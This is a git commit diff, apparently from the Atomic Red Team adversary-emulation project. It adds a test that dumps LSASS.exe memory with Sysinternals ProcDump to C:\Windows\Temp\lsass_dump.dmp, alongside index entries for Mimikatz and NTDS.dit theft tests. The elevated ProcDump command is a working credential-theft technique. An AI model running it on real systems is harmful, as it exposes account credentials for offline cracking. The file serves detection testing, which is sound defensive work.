Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci]

2021-02-03 02:33:01 +00:00
parent 333e2407af
commit 802c6f33bc
6 changed files with 101 additions and 0 deletions
@@ -215,6 +215,7 @@ credential-access,T1003.001,LSASS Memory,5,Dump LSASS.exe Memory using Windows T
 credential-access,T1003.001,LSASS Memory,6,Offline Credential Theft With Mimikatz,453acf13-1dbd-47d7-b28a-172ce9228023,command_prompt
 credential-access,T1003.001,LSASS Memory,7,LSASS read with pypykatz,c37bc535-5c62-4195-9cc3-0517673171d8,command_prompt
 credential-access,T1003.001,LSASS Memory,8,Dump LSASS.exe Memory using Out-Minidump.ps1,6502c8f0-b775-4dbd-9193-1298f56b6781,powershell
+credential-access,T1003.001,LSASS Memory,9,Create Mini Dump of LSASS.exe using ProcDump,7cede33f-0acd-44ef-9774-15511300b24b,command_prompt
 credential-access,T1003.003,NTDS,1,Create Volume Shadow Copy with vssadmin,dcebead7-6c28-4b4b-bf3c-79deb1b1fc7f,command_prompt
 credential-access,T1003.003,NTDS,2,Copy NTDS.dit from Volume Shadow Copy,c6237146-9ea6-4711-85c9-c56d263a6b03,command_prompt
 credential-access,T1003.003,NTDS,3,Dump Active Directory Database with NTDSUtil,2364e33d-ceab-4641-8468-bfb1d7cc2723,command_prompt
@@ -23,6 +23,7 @@ credential-access,T1003.001,LSASS Memory,5,Dump LSASS.exe Memory using Windows T
 credential-access,T1003.001,LSASS Memory,6,Offline Credential Theft With Mimikatz,453acf13-1dbd-47d7-b28a-172ce9228023,command_prompt
 credential-access,T1003.001,LSASS Memory,7,LSASS read with pypykatz,c37bc535-5c62-4195-9cc3-0517673171d8,command_prompt
 credential-access,T1003.001,LSASS Memory,8,Dump LSASS.exe Memory using Out-Minidump.ps1,6502c8f0-b775-4dbd-9193-1298f56b6781,powershell
+credential-access,T1003.001,LSASS Memory,9,Create Mini Dump of LSASS.exe using ProcDump,7cede33f-0acd-44ef-9774-15511300b24b,command_prompt
 credential-access,T1003.003,NTDS,1,Create Volume Shadow Copy with vssadmin,dcebead7-6c28-4b4b-bf3c-79deb1b1fc7f,command_prompt
 credential-access,T1003.003,NTDS,2,Copy NTDS.dit from Volume Shadow Copy,c6237146-9ea6-4711-85c9-c56d263a6b03,command_prompt
 credential-access,T1003.003,NTDS,3,Dump Active Directory Database with NTDSUtil,2364e33d-ceab-4641-8468-bfb1d7cc2723,command_prompt
@@ -437,6 +437,7 @@
  - Atomic Test #6: Offline Credential Theft With Mimikatz [windows]
  - Atomic Test #7: LSASS read with pypykatz [windows]
  - Atomic Test #8: Dump LSASS.exe Memory using Out-Minidump.ps1 [windows]
+  - Atomic Test #9: Create Mini Dump of LSASS.exe using ProcDump [windows]
 - T1557 Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1003.003 NTDS](../../T1003.003/T1003.003.md)
@@ -47,6 +47,7 @@
  - Atomic Test #6: Offline Credential Theft With Mimikatz [windows]
  - Atomic Test #7: LSASS read with pypykatz [windows]
  - Atomic Test #8: Dump LSASS.exe Memory using Out-Minidump.ps1 [windows]
+  - Atomic Test #9: Create Mini Dump of LSASS.exe using ProcDump [windows]
 - T1557 Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1003.003 NTDS](../../T1003.003/T1003.003.md)
@@ -20519,6 +20519,47 @@ credential-access:
 '
        name: powershell
        elevation_required: true
+    - name: Create Mini Dump of LSASS.exe using ProcDump
+      auto_generated_guid: 7cede33f-0acd-44ef-9774-15511300b24b
+      description: |
+        The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with Sysinternals
+        ProcDump. This particular method uses -mm to produce a mini dump of lsass.exe
+
+        Upon successful execution, you should see the following file created c:\windows\temp\lsass_dump.dmp.
+
+        If you see a message saying "procdump.exe is not recognized as an internal or external command", try using the  get-prereq_commands to download and install the ProcDump tool first.
+      supported_platforms:
+      - windows
+      input_arguments:
+        output_file:
+          description: Path where resulting dump should be placed
+          type: Path
+          default: C:\Windows\Temp\lsass_dump.dmp
+        procdump_exe:
+          description: Path of Procdump executable
+          type: Path
+          default: PathToAtomicsFolder\T1003.001\bin\procdump.exe
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'ProcDump tool from Sysinternals must exist on disk at specified
+          location (#{procdump_exe})
+
+'
+        prereq_command: 'if (Test-Path #{procdump_exe}) {exit 0} else {exit 1}
+
+'
+        get_prereq_command: |
+          Invoke-WebRequest "https://download.sysinternals.com/files/Procdump.zip" -OutFile "$env:TEMP\Procdump.zip"
+          Expand-Archive $env:TEMP\Procdump.zip $env:TEMP\Procdump -Force
+          New-Item -ItemType Directory (Split-Path #{procdump_exe}) -Force | Out-Null
+          Copy-Item $env:TEMP\Procdump\Procdump.exe #{procdump_exe} -Force
+      executor:
+        command: "#{procdump_exe} -accepteula -mm lsass.exe #{output_file}\n"
+        cleanup_command: 'del "#{output_file}" >nul 2> nul
+
+'
+        name: command_prompt
+        elevation_required: true
  T1557:
    technique:
      external_references:
@@ -42,6 +42,8 @@ The following SSPs can be used to access credentials:

 - [Atomic Test #8 - Dump LSASS.exe Memory using Out-Minidump.ps1](#atomic-test-8---dump-lsassexe-memory-using-out-minidumpps1)

+- [Atomic Test #9 - Create Mini Dump of LSASS.exe using ProcDump](#atomic-test-9---create-mini-dump-of-lsassexe-using-procdump)
+

 <br/>

@@ -418,4 +420,58 @@ Remove-Item $env:TEMP\lsass_*.dmp -ErrorAction Ignore



+<br/>
+<br/>
+
+## Atomic Test #9 - Create Mini Dump of LSASS.exe using ProcDump
+The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with Sysinternals
+ProcDump. This particular method uses -mm to produce a mini dump of lsass.exe
+
+Upon successful execution, you should see the following file created c:\windows\temp\lsass_dump.dmp.
+
+If you see a message saying "procdump.exe is not recognized as an internal or external command", try using the  get-prereq_commands to download and install the ProcDump tool first.
+
+**Supported Platforms:** Windows
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value | 
+|------|-------------|------|---------------|
+| output_file | Path where resulting dump should be placed | Path | C:&#92;Windows&#92;Temp&#92;lsass_dump.dmp|
+| procdump_exe | Path of Procdump executable | Path | PathToAtomicsFolder&#92;T1003.001&#92;bin&#92;procdump.exe|
+
+
+#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
+
+
+```cmd
+#{procdump_exe} -accepteula -mm lsass.exe #{output_file}
+```
+
+#### Cleanup Commands:
+```cmd
+del "#{output_file}" >nul 2> nul
+```
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: ProcDump tool from Sysinternals must exist on disk at specified location (#{procdump_exe})
+##### Check Prereq Commands:
+```powershell
+if (Test-Path #{procdump_exe}) {exit 0} else {exit 1} 
+```
+##### Get Prereq Commands:
+```powershell
+Invoke-WebRequest "https://download.sysinternals.com/files/Procdump.zip" -OutFile "$env:TEMP\Procdump.zip"
+Expand-Archive $env:TEMP\Procdump.zip $env:TEMP\Procdump -Force
+New-Item -ItemType Directory (Split-Path #{procdump_exe}) -Force | Out-Null
+Copy-Item $env:TEMP\Procdump\Procdump.exe #{procdump_exe} -Force
+```
+
+
+
+
 <br/>